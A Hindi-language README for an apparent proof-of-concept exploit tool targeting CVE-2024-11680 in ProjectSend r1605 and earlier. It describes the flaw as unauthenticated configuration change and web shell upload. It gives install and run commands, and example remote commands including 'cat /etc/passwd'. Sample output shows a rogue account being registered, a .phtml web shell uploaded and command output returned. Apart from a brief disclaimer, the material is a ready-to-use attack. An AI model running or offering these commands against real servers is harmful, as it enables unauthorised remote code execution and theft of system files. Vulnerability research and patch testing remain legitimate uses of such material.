
इस रिपॉजिटरी में CVE-2024-11680 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है, जो ProjectSend r1605 और पुराने संस्करणों में एक महत्वपूर्ण भेद्यता है। शोषण गलत विशेषाधिकार सेटिंग्स और कमांड इंजेक्शन की समस्याओं के कारण गलत प्रमाणीकरण के उद्देश्य से है।
यह CVE-2024-11680 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण है, जो ProjectSend में एक अप्रमाणित कॉन्फ़िगरेशन संशोधन और वेब शेल अपलोड कमजोरी है।
यह शोषण ProjectSend में कई कमजोरियों का लाभ उठाता है:
pip install requests colorama
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
-u, --url: लक्ष्य URL (उदा., http://target.com/projectsend)-c, --command: लक्ष्य पर निष्पादित करने का आदेश (डिफ़ॉल्ट: id)# Python संस्करण प्राप्त करें
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# निर्देशिका सामग्री सूचीबद्ध करें
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# सिस्टम जानकारी प्राप्त करें
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# passwd फ़ाइल पढ़ें
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है।
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2